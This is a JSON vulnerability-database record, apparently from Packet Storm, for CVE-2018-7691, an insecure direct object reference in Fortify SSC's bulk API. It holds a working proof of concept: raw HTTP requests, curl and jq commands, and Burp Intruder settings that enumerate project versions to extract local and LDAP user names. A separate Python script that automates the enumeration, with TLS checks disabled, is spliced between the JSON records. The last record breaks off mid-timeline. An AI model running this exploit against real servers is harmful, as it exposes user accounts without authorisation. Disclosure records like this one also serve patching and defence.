{"id": "PACKETSTORM:150771", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Fortify SSC 17.10 / 17.20 / 18.10 User Detail Insecure Direct Object Reference", "description": "", "published": "2018-12-13T00:00:00", "modified": "2018-12-13T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://packetstormsecurity.com/files/150771/Fortify-SSC-17.10-17.20-18.10-User-Detail-Insecure-Direct-Object-Reference.html", "reporter": "Alt3kx", "references": [], "cvelist": ["CVE-2018-7691"], "lastseen": "2018-12-13T10:52:13", "viewCount": 53, "enchantments": {"score": {"value": 4.6, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-7691"]}, {"type": "exploitdb", "idList": ["EDB-ID:45990"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:0C54CFC9B8CF2939D4AAD367FBCC65C8"]}, {"type": "zdt", "idList": ["1337DAY-ID-31784"]}], "rev": 4}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2018-7691"]}, {"type": "exploitdb", "idList": ["EDB-ID:45990"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:0C54CFC9B8CF2939D4AAD367FBCC65C8"]}, {"type": "zdt", "idList": ["1337DAY-ID-31784"]}]}, "exploitation": null, "vulnersScore": 4.6}, "sourceHref": "https://packetstormsecurity.com/files/download/150771/CVE-2018-7691.txt", "sourceData": "`Details \n================ \nSoftware: Fortify SSC (Software Security Center) \nVersion: 17.10, 17.20 & 18.10 \nHomepage: https://www.microfocus.com \nAdvisory report: https://github.com/alt3kx/CVE-2018-7691 \nCVE: CVE-2018-7691 \nCVSS: 6.5 (Medium; AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) \nCWE-639 \n \nDescription \n================ \nThe REST API contains an insecure direct object reference (IDOR) that lets any authenticated user, including one holding only the view-only role, extract arbitrary details of local and LDAP users via a POST request to the bulk endpoint. \n \nVulnerability \n================ \nFortify SSC (Software Security Center) 17.10, 17.20 and 18.10 do not properly check that the caller is authorized for the project version referenced in the URL before returning its \"authEntities\", which allows remote authenticated (view-only) users \nto read 
arbitrary details via the bulk API by pointing it at /api/v1/projectVersions/{NUMBER}/authEntities for any project-version number \n \nNote: the View-only role is a restricted role: it can view results, but cannot interfere with issue triage or the remediation process. \n \n \nProof of concept \n================ \n \nPre-requisites: \n \n- curl installed (Windows or Linux) \n- jq installed, for parsing JSON fields (Windows or Linux) \n- Burp Suite Free/Pro or any other HTTP proxy, to catch/send the request (optional) \n \nStep (1): Log on to the fortifyserver.com SSC (Software Security Center) 17.10 instance with your view-only (restricted) role. \n \nThe URL is normally available as follows: \n \nTarget: https://fortifyserver.com/ssc/#/ \n \nStep (2): Once logged in, extract the session cookie; its format is normally as follows: \"Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\" \nStep (3): Start Burp Suite Free/Pro or any other HTTP proxy (optional), listening on port 8080 by default. \n \nStep (4): The offending POST is: \n \nPOST /ssc/api/v1/bulk HTTP/1.1 \nHost: fortifyserver.com \nConnection: close \nAccept: application/json, text/plain, */* \nX-Requested-With: XMLHttpRequest \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36 \nContent-Type: application/json;charset=UTF-8 \nAccept-Encoding: gzip, deflate \nAccept-Language: en-US,en;q=0.9 \nCookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414; \nContent-Length: 123 \n \n{\"requests\":[{\"uri\":\"https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities\",\"httpVerb\":\"GET\"}]}\\x0d\\x0a \n \n \nStep (5): Send the first POST request (including the session cookie) and parse the JSON received using curl and jq as follows (drop the --proxy option if no proxy is running): \n \n# curl -s -k -X POST https://fortifyserver.com/ssc/api/v1/bulk \\\n-H \"Host: fortifyserver.com\" \\\n-H \"Connection: close\" \\\n-H \"Accept: application/json, text/plain, */*\" \\\n-H \"X-Requested-With: XMLHttpRequest\" \\\n-H 
\"User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36\" \\\n-H \"Content-Type: application/json;charset=UTF-8\" \\\n-H \"Accept-Encoding: gzip, deflate\" \\\n-H \"Accept-Language: en-US,en;q=0.9\" \\\n-H \"Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\" \\\n-b \"JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\" \\\n--data-binary \"{\\\"requests\\\":[{\\\"uri\\\":\\\"https://fortifyserver.com/ssc/api/v1/projectVersions/0/authEntities\\\",\\\"httpVerb\\\":\\\"GET\\\"}]}\\x0d\\x0a\" \\\n--proxy http://127.0.0.1:8080 | jq '.data[] .responses[] .body .responseCode' \n \nYou should see the following response: \n \n200 \n \nStep (6): Now extract all local and LDAP users registered in the Fortify SSC server: \n \nPayload: /api/v1/projectVersions/{NUMBER}/authEntities; change the number in the \"--data-binary\" field below to target another project version: \n \n# curl -s -k -X POST https://fortifyserver.com/ssc/api/v1/bulk \\\n-H \"Host: fortifyserver.com\" \\\n-H \"Connection: close\" \\\n-H \"Accept: application/json, text/plain, */*\" \\\n-H \"X-Requested-With: XMLHttpRequest\" \\\n-H \"User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36\" \\\n-H \"Content-Type: application/json;charset=UTF-8\" \\\n-H \"Accept-Encoding: gzip, deflate\" \\\n-H \"Accept-Language: en-US,en;q=0.9\" \\\n-H \"Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\" \\\n-b \"JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\" \\\n--data-binary \"{\\\"requests\\\":[{\\\"uri\\\":\\\"https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities\\\",\\\"httpVerb\\\":\\\"GET\\\"}]}\\x0d\\x0a\" \\\n--proxy http://127.0.0.1:8080 | jq '.data[] .responses[] .body .data[] .entityName' \n \nYou should see the following response, listing the users available: \n \n\"admin\" \n\"sca\" \n\"alex\" \n \n[../snip] \n \nStep (7): Automate with Burp Suite Pro/Free (Intruder): \n \nPayload positions: in \"Intruder Tab -> Positions\", highlight the payload position as 
follows: \n \n \n-> /api/v1/projectVersions/\u00a71\u00a7/authEntities \n \n \nPayload set: in \"Intruder Tab -> Payloads\", use the following settings: \n \n \n-> Payload set: 1 \n \n-> Payload type: Numbers \n \n \nPayload Options [Numbers]: \n \n \n-> Type: Sequential \n \n-> From: 0 \n \n-> To: 1500 \n \n-> Step: 1 \n \n \nThen start the attack; a 200 response carrying user entries for a project version the view-only account has no access to confirms the IDOR. \nHave fun! \n \n \nMitigations \n================ \nInstall the latest patches, available here: \nhttps://softwaresupport.softwaregrp.com/doc/KM03298201 \n \n(The fixes were re-tested by the researcher on an SSC 18.20 deployment; see the timeline below.) \n \nDisclosure policy \n================ \nWe believe in responsible disclosure. \nPlease contact us on Alex Hernandez aka alt3kx (at) protonmail com to acknowledge this report. \n \nThis vulnerability will be published if we do not receive a response to this report within 10 days. \n \nTimeline \n================ \n \n2018-05-24: Discovered \n2018-05-25: Retest PRO environment \n2018-05-31: Vendor notification, two issues found \n2018-05-31: Vendor feedback received \n2018-06-01: Internal communication \n2018-06-01: Vendor feedback, two issues are confirmed \n2018-06-05: Vendor notification, new issue found \n2018-06-06: Vendor feedback, evaluating High submission \n2018-06-08: Vendor feedback, High issue is confirmed \n2018-06-19: Researcher reminder sent \n2018-06-22: Vendor feedback, summary of CVEs to be handled through the official process \n2018-06-26: Vendor feedback, official Hotfix for High issue available to test \n2018-06-29: Researcher feedback \n2018-07-02: Researcher feedback \n2018-07-04: Researcher feedback, Hotfix tested on QA environment \n2018-07-05: Vendor feedback, fixes scheduled Aug/Sep 2018 \n2018-08-02: Reminder to vendor, feedback received OK! \n2018-09-26: Reminder to vendor, feedback received OK! 
\n2018-09-26: Fixes received from the vendor \n2018-10-02: Internal QA environment failed, re-building researcher's ecosystem \n2018-10-11: Internal QA environment failed, re-building researcher's ecosystem \n2018-10-11: Feedback from the vendor, technical details provided to the researcher \n2018-10-16: Fixes now tested on QA environment \n2018-11-08: Reminder received from the vendor, feedback provided by researcher \n2018-11-09: Re-test fixes on QA environment \n2018-11-15: Re-test fixes on QA environment, now with SSC 18.20 deployed \n2018-11-21: Researcher feedback \n2018-11-23: Fixes working well/confirmed by researcher \n2018-11-23: Vendor feedback, final details to disclose the CVE and official fixes available for customers. \n2018-11-26: Vendor feedback, CVE and official fixes to be disclosed \n2018-11-26: Agreement with the vendor to publish the CVE/Advisory. \n2018-12-12: Public report \n \nDiscovered by: \nAlex Hernandez aka alt3kx: \n================ \nPlease visit https://github.com/alt3kx for more information. \n \nMy current exploit list @exploit-db: \nhttps://www.exploit-db.com/author/?a=1074 & https://www.exploit-db.com/author/?a=9576 \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645450862}}
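The proof of concept above (steps 5 to 7), as an added worked example that is not part of the advisory and is not Micro Focus code: a small Python client that builds the `/ssc/api/v1/bulk` request, parses the response along the same paths the advisory's jq filters walk, and sweeps a range of project-version IDs in batches instead of one Burp Intruder request per ID. Two things are assumptions rather than facts from the advisory: that a bulk response lists its sub-responses in the same order as the posted `requests` array, and the exact response shape. The host name, session cookie and the sample response embedded below are constructed so the script runs offline; `urllib_post` is the transport to substitute for a live test.

```python
"""
Added example (not from the advisory or the vendor): client for the SSC bulk
endpoint that reproduces PoC steps 5-7 of CVE-2018-7691 in one script.

Assumptions not confirmed by the advisory:
  * sub-responses come back in the same order as the posted "requests";
  * the response shape is the one the PoC's jq filters walk:
      .data[].responses[].body.responseCode
      .data[].responses[].body.data[].entityName
"""
import json
import ssl
import urllib.request
from typing import Callable, Dict, Iterable, List, Tuple

BULK_PATH = "/ssc/api/v1/bulk"

# Transport signature: post(url, headers, body) -> response text. Injected so
# the enumeration logic can be exercised offline against a fake server.
Poster = Callable[[str, Dict[str, str], str], str]


def build_bulk_body(base_url: str, version_ids: Iterable[int]) -> str:
    """JSON body for one bulk POST wrapping a GET of
    /ssc/api/v1/projectVersions/{id}/authEntities per id (several per call,
    where the PoC sends one request per POST)."""
    reqs = [
        {"uri": f"{base_url}/ssc/api/v1/projectVersions/{vid}/authEntities",
         "httpVerb": "GET"}
        for vid in version_ids
    ]
    return json.dumps({"requests": reqs})


def parse_bulk_response(raw: str) -> List[Tuple[int, List[str]]]:
    """(responseCode, [entityName, ...]) for every sub-response, in order."""
    doc = json.loads(raw)
    out: List[Tuple[int, List[str]]] = []
    for item in doc.get("data", []):
        for resp in item.get("responses", []):
            body = resp.get("body") or {}
            code = int(body.get("responseCode", 0))
            names = [e["entityName"] for e in (body.get("data") or []) if "entityName" in e]
            out.append((code, names))
    return out


def enumerate_auth_entities(base_url: str, jsessionid: str, version_ids: Iterable[int],
                            post: Poster, batch_size: int = 25) -> Dict[int, List[str]]:
    """Walk candidate project-version IDs (the PoC's Intruder range is 0..1500)
    and return {id: [entityName, ...]} for every version whose authEntities the
    session could read. A 200 with no entries is not counted as a leak."""
    headers = {
        "Accept": "application/json, text/plain, */*",
        "Content-Type": "application/json;charset=UTF-8",
        "X-Requested-With": "XMLHttpRequest",
        "Cookie": f"JSESSIONID={jsessionid}",
    }
    leaked: Dict[int, List[str]] = {}
    ids = list(version_ids)
    for start in range(0, len(ids), batch_size):
        batch = ids[start:start + batch_size]
        raw = post(base_url + BULK_PATH, headers, build_bulk_body(base_url, batch))
        # Relies on the order assumption stated in the module docstring.
        for vid, (code, names) in zip(batch, parse_bulk_response(raw)):
            if code == 200 and names:
                leaked[vid] = names
    return leaked


def urllib_post(url: str, headers: Dict[str, str], body: str) -> str:
    """Real transport. Mirrors the PoC's `curl -k` by disabling TLS
    verification; keep verification on outside a lab."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    req = urllib.request.Request(url, data=body.encode("utf-8"), headers=headers, method="POST")
    with urllib.request.urlopen(req, context=ctx, timeout=30) as resp:
        return resp.read().decode("utf-8")


# Constructed sample response (not captured from a real SSC) with three
# sub-responses: one leaking users, one not found, one readable but empty.
SAMPLE_BULK_RESPONSE = json.dumps({"data": [{"responses": [
    {"body": {"responseCode": 200,
              "data": [{"entityName": "admin"}, {"entityName": "sca"}, {"entityName": "alex"}]}},
    {"body": {"responseCode": 404, "data": []}},
    {"body": {"responseCode": 200, "data": []}},
]}]})


def fake_post(url: str, headers: Dict[str, str], body: str) -> str:
    """Offline stand-in for the server: always returns the constructed sample."""
    return SAMPLE_BULK_RESPONSE


if __name__ == "__main__":
    # Offline dry run; swap fake_post for urllib_post plus a real host and
    # view-only session cookie to test a live instance.
    found = enumerate_auth_entities("https://fortifyserver.com",
                                    "69B1DBD72FCA8DB57C08B01655A07414", [3, 0, 7], fake_post)
    for vid, names in found.items():
        print(f"projectVersion {vid}: {', '.join(names)}")
```

Run as-is for the offline dry run. Against a live instance the same function is also the post-patch check: with a view-only session that is assigned to no project version, a fixed server should return no entries (or a non-200 code) for every ID in the sweep, and any ID that still comes back with user names is the IDOR.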
{"exploitpack": [{"lastseen": "2020-04-01T19:04:16", "description": "\nFortify Software Security Center (SSC) 17.1017.2018.10 - Information Disclosure (2)", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-12-14T00:00:00", "title": "Fortify Software Security Center (SSC) 17.1017.2018.10 - Information Disclosure (2)", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7691"], "modified": "2018-12-14T00:00:00", "id": "EXPLOITPACK:0C54CFC9B8CF2939D4AAD367FBCC65C8", "href": "", "sourceData": "Details\n================\nSoftware: Fortify SSC (Software Security Center)\nVersion: 17.10, 17.20 & 18.10\nHomepage: https://www.microfocus.com\nAdvisory report: https://github.com/alt3kx/CVE-2018-7691\nCVE: CVE-2018-7691\nCVSS: 6.5 (Medium; AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)\nCWE-639\n\nDescription\n================\nREST API contains Insecure direct object references (IDOR) allowing and extracting arbitrary details of the Local and LDAP users via POST method\n\nVulnerability\n================\nFortify SSC (Software Security Center) 17.10, does not properly check ownership 
of \"authEntities\", which allows remote authenticated (view-only) users\nto read arbitrary details via API bulk parameter to /api/v1/projectVersions/{NUMBER}/authEntities\n\nNote: View-only Role, is a restricted role, can view results, but cannot interfere with the issue triage or the remediation process.\n\nProof of concept\n================\n\nPre-requisites:\n\n- Curl command deployed (Windows or Linux)\n- jq command deployed (for parsing JSON fields), (Windows or Linux)\n- Burpsuite Free/Por deployed or any other Proxy to catch/send the request (optional)\n\nStep (1): LogOn into fortifyserver.com SSC (Software Security Center) 17.10 with your view-only role (restricted),\n\nThe URL normally is avaiable as following:\n\nTarget: https://fortifyserver.com/ssc/#/\n\nStep (2): Once logged extract the Cookie field, the format normally as following: \"Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\"\nStep (3): Start BurpSuite Free/Pro or any other HTTP proxy (optional) listen port 8080 as default\n\nStep (4): The offending POST is:\n\nPOST /ssc/api/v1/bulk HTTP/1.1\nHost: fortifyserver.com\nConnection: close\nAccept: application/json, text/plain, */*\nX-Requested-With: XMLHttpRequest\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36\nContent-Type: application/json;charset=UTF-8\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nCookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\nContent-Length: 123\n\n{\"requests\":[{\"uri\":\"https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities\",\"httpVerb\":\"GET\"}]}\\x0d\\x0a\n\nStep (5): Test the first POST (to be included the cookie session) request and parsing the JSON data received using curl and jq commands as following:\n\n# curl -s -k -X POST https://fortifyserver.com/ssc/api/v1/bulk\n\n-H \"Host: fortifyserver.com\"\n-H \"Connection: close\"\n-H \"Accept: application/json, text/plain, */*\"\n-H \"X-Requested-With: 
XMLHttpRequest\"\n-H \"User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36\"\n-H \"Content-Type: application/json;charset=UTF-8\"\n-H \"Accept-Encoding: gzip, deflate\"\n-H \"Accept-Language: en-US,en;q=0.9\"\n-H \"Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\"\n-b \"JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\"\n--data-binary \"{\\\"requests\\\":[{\\\"uri\\\":\\\"https://fortifyserver.com/ssc/api/v1/projectVersions/0/authEntities\\\",\\\"httpVerb\\\":\\\"GET\\\"}]}\\x0d\\x0a\"\n--proxy http://127.0.0.1:8080 | jq '.data[] .responses[] .body .responseCode'\n\nYou should see the following response:\n\n200\n\nStep (6): Now extract all local and LDAP users registered into Fortify SSC server:\n\nPayload: /api/v1/projectVersions/{NUMBER}/authEntities, see the field \"--data-binary\" below and change the number as following:\n\n# curl -s -k -X POST https://fortifyserver.com/ssc/api/v1/bulk\n\n-H \"Host: fortifyserver.com\"\n-H \"Connection: close\"\n-H \"Accept: application/json, text/plain, */*\"\n-H \"X-Requested-With: XMLHttpRequest\"\n-H \"User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36\"\n-H \"Content-Type: application/json;charset=UTF-8\"\n-H \"Accept-Encoding: gzip, deflate\"\n-H \"Accept-Language: en-US,en;q=0.9\"\n-H \"Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\"\n-b \"JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\"\n--data-binary \"{\\\"requests\\\":[{\\\"uri\\\":\\\"https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities\\\",\\\"httpVerb\\\":\\\"GET\\\"}]}\\x0d\\x0a\"\n--proxy http://127.0.0.1:8080 | jq '.data[] .responses[] .body .data[] .entityName'\n\nYou should see the following response with users available\n\n\"admin\"\n\"sca\"\n\"alex\"\n\n[../snip]\n\nStep (7): Automate with BurpSuite Pro/Free choose:\n\nPayload Positions: \"Intruder Tab -> Positions\" highlight as following:\n\n-> 
/api/v1/projectVersions/\u00a71\u00a7/authEntities\n\nPayloads set: \"Intruder Tab -> Payloads\" with the following data:\n\n-> Payload set: 1\n\n-> Payload type: Numbers\n\nPayload Options [Numbers]:\n\n-> Type: Sequential\n\n-> From: 0\n\n-> To: 1500\n\n-> Step: 1\n\nThen start attack\u2026\nHave fun!\n\nHave fun!\n\nMitigations\n================\nInstall the latest patches availabe here:\nhttps://softwaresupport.softwaregrp.com/doc/KM03298201\n\nDisclosure policy\n================\nWe believes in responsible disclosure.\nPlease contact us on Alex Hernandez aka alt3kx (at) protonmail com to acknowledge this report.\n\nThis vulnerability will be published if we do not receive a response to this report with 10 days.\n\nTimeline\n================\n\n2018-05-24: Discovered\n2018-05-25: Retest PRO environment\n2018-05-31: Vendor notification, two issues found\n2018-05-31: Vendor feedback received\n2018-06-01: Internal communication\n2018-06-01: Vendor feedback, two issues are confirmed\n2018-06-05: Vendor notification, new issue found\n2018-06-06: Vendor feedback, evaluating High submission\n2018-06-08: Vendor feedback, High issue is confirmed\n2018-06-19: Researcher, reminder sent\n2018-06-22: Vendor feedback, summary of CVEs handled as official way\n2018-06-26: Vendor feedback, official Hotfix for High issue available to test\n2018-06-29: Researcher feedback\n2018-07-02: Researcher feedback\n2018-07-04: Researcher feedback, Hotfix tested on QA environment\n2018-07-05: Vendor feedback, fixes scheduled Aug/Sep 2018\n2018-08-02: Reminder to vendor, feedback received OK!\n2018-09-26: Reminder to vendor, feedback received OK!\n2018-09-26: Fixes received from the vendor\n2018-10-02: Internal QA environment failed, re-building researcher 's ecosystem\n2018-10-11: Internal QA environment failed, re-building researcher 's ecosystem\n2018-10-11: Feedback from the vendor, technical details provided to the researcher\n2018-10-16: Fixes now tested on QA environment\n2018-11-08: 
Reminder received from the vendor, feedback provided by researcher\n2018-11-09: Re-rest fixes on QA environment\n2018-11-15: Re-rest fixes on QA environment now with SSC 18.20 version deployed\n2018-11-21: Researcher feedback\n2018-11-23: Fixes working well/confirmed by researcher\n2018-11-23: Vendor feedback, final details to disclosure the CVE and official fixes available for customers.\n2018-11-26: Vendor feedback, CVE, and official fixes to be disclosure\n2018-11-26: Agreements with the vendor to publish the CVE/Advisory.\n2018-12-12: Public report\n\nDiscovered by:\nAlex Hernandez aka alt3kx:\n================\nPlease visit https://github.com/alt3kx for more information.\n\nMy current exploit list @exploit-db:\nhttps://www.exploit-db.com/author/?a=1074 & https://www.exploit-db.com/author/?a=9576", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}], "zdt": [{"lastseen": "2018-12-18T06:31:09", "description": "Exploit for multiple platform in category web applications", "cvss3": {}, "published": "2018-12-14T00:00:00", "type": "zdt", "title": "Fortify Software Security Center (SSC) 17.10/17.20/18.10 - Information Disclosure (2)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-7691"], "modified": "2018-12-14T00:00:00", "id": "1337DAY-ID-31784", "href": "https://0day.today/exploit/description/31784", "sourceData": "Details\r\n================\r\nSoftware: Fortify SSC (Software Security Center)\r\nVersion: 17.10, 17.20 & 18.10\r\nHomepage: https://www.microfocus.com\r\nAdvisory report: https://github.com/alt3kx/CVE-2018-7691\r\nCVE: CVE-2018-7691\r\nCVSS: 6.5 (Medium; AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)\r\nCWE-639\r\n\r\nDescription\r\n================\r\nREST API contains Insecure direct object references (IDOR) allowing and extracting arbitrary details of the Local and LDAP users via POST method\r\n\r\nVulnerability\r\n================\r\nFortify SSC (Software Security Center) 17.10, does not properly check ownership of 
\"authEntities\", which allows remote authenticated (view-only) users\r\nto read arbitrary details via API bulk parameter to /api/v1/projectVersions/{NUMBER}/authEntities\r\n\r\nNote: View-only Role, is a restricted role, can view results, but cannot interfere with the issue triage or the remediation process.\r\n\r\nProof of concept\r\n================\r\n\r\nPre-requisites:\r\n\r\n- Curl command deployed (Windows or Linux)\r\n- jq command deployed (for parsing JSON fields), (Windows or Linux)\r\n- Burpsuite Free/Por deployed or any other Proxy to catch/send the request (optional)\r\n\r\nStep (1): LogOn into fortifyserver.com SSC (Software Security Center) 17.10 with your view-only role (restricted),\r\n\r\nThe URL normally is avaiable as following:\r\n\r\nTarget: https://fortifyserver.com/ssc/#/\r\n\r\nStep (2): Once logged extract the Cookie field, the format normally as following: \"Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\"\r\nStep (3): Start BurpSuite Free/Pro or any other HTTP proxy (optional) listen port 8080 as default\r\n\r\nStep (4): The offending POST is:\r\n\r\nPOST /ssc/api/v1/bulk HTTP/1.1\r\nHost: fortifyserver.com\r\nConnection: close\r\nAccept: application/json, text/plain, */*\r\nX-Requested-With: XMLHttpRequest\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36\r\nContent-Type: application/json;charset=UTF-8\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nCookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\r\nContent-Length: 123\r\n\r\n{\"requests\":[{\"uri\":\"https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities\",\"httpVerb\":\"GET\"}]}\\x0d\\x0a\r\n\r\nStep (5): Test the first POST (to be included the cookie session) request and parsing the JSON data received using curl and jq commands as following:\r\n\r\n# curl -s -k -X POST https://fortifyserver.com/ssc/api/v1/bulk\r\n\r\n-H \"Host: fortifyserver.com\"\r\n-H \"Connection: 
close\"\r\n-H \"Accept: application/json, text/plain, */*\"\r\n-H \"X-Requested-With: XMLHttpRequest\"\r\n-H \"User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36\"\r\n-H \"Content-Type: application/json;charset=UTF-8\"\r\n-H \"Accept-Encoding: gzip, deflate\"\r\n-H \"Accept-Language: en-US,en;q=0.9\"\r\n-H \"Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\"\r\n-b \"JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\"\r\n--data-binary \"{\\\"requests\\\":[{\\\"uri\\\":\\\"https://fortifyserver.com/ssc/api/v1/projectVersions/0/authEntities\\\",\\\"httpVerb\\\":\\\"GET\\\"}]}\\x0d\\x0a\"\r\n--proxy http://127.0.0.1:8080 | jq '.data[] .responses[] .body .responseCode'\r\n\r\nYou should see the following response:\r\n\r\n200\r\n\r\nStep (6): Now extract all local and LDAP users registered into Fortify SSC server:\r\n\r\nPayload: /api/v1/projectVersions/{NUMBER}/authEntities, see the field \"--data-binary\" below and change the number as following:\r\n\r\n# curl -s -k -X POST https://fortifyserver.com/ssc/api/v1/bulk\r\n\r\n-H \"Host: fortifyserver.com\"\r\n-H \"Connection: close\"\r\n-H \"Accept: application/json, text/plain, */*\"\r\n-H \"X-Requested-With: XMLHttpRequest\"\r\n-H \"User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36\"\r\n-H \"Content-Type: application/json;charset=UTF-8\"\r\n-H \"Accept-Encoding: gzip, deflate\"\r\n-H \"Accept-Language: en-US,en;q=0.9\"\r\n-H \"Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\"\r\n-b \"JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;\"\r\n--data-binary \"{\\\"requests\\\":[{\\\"uri\\\":\\\"https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities\\\",\\\"httpVerb\\\":\\\"GET\\\"}]}\\x0d\\x0a\"\r\n--proxy http://127.0.0.1:8080 | jq '.data[] .responses[] .body .data[] .entityName'\r\n\r\nYou should see the following response with users 
available\r\n\r\n\"admin\"\r\n\"sca\"\r\n\"alex\"\r\n\r\n[../snip]\r\n\r\nStep (7): Automate with BurpSuite Pro/Free choose:\r\n\r\nPayload Positions: \"Intruder Tab -> Positions\" highlight as following:\r\n\r\n-> /api/v1/projectVersions/\u00a71\u00a7/authEntities\r\n\r\nPayloads set: \"Intruder Tab -> Payloads\" with the following data:\r\n\r\n-> Payload set: 1\r\n\r\n-> Payload type: Numbers\r\n\r\nPayload Options [Numbers]:\r\n\r\n-> Type: Sequential\r\n\r\n-> From: 0\r\n\r\n-> To: 1500\r\n\r\n-> Step: 1\r\n\r\nThen start attack\u2026\r\nHave fun!\r\n\r\nHave fun!\r\n\r\nMitigations\r\n================\r\nInstall the latest patches availabe here:\r\nhttps://softwaresupport.softwaregrp.com/doc/KM03298201\r\n\r\nDisclosure policy\r\n================\r\nWe believes in responsible disclosure.\r\nPlease contact us on Alex Hernandez aka alt3kx (at) protonmail com to acknowledge this report.\r\n\r\nThis vulnerability will be published if we do not receive a response to this report with 10 days.\r\n\r\nTimeline\r\n================\r\n\r\n2018-05-24: Discovered\r\n2018-05-25: Retest PRO environment\r\n2018-05-31: Vendor notification, two issues found\r\n2018-05-31: Vendor feedback received\r\n2018-06-01: Internal communication\r\n2018-06-01: Vendor feedback, two issues are confirmed\r\n2018-06-05: Vendor notification, new issue found\r\n2018-06-06: Vendor feedback, evaluating High submission\r\n2018-06-08: Vendor feedback, High issue is confirmed\r\n2018-06-19: Researcher, reminder sent\r\n2018-06-22: Vendor feedback, summary of CVEs handled as official way\r\n2018-06-26: Vendor feedback, official Hotfix for High issue available to test\r\n2018-06-29: Researcher feedback\r\n2018-07-02: Researcher feedback\r\n2018-07-04: Researcher feedback, Hotfix tested on QA environment\r\n2018-07-05: Vendor feedback, fixes scheduled Aug/Sep 2018\r\n2018-08-02: Reminder to vendor, feedback received OK!\r\n2018-09-26: Reminder to vendor, feedback received OK!\r\n2018-09-26: Fixes 
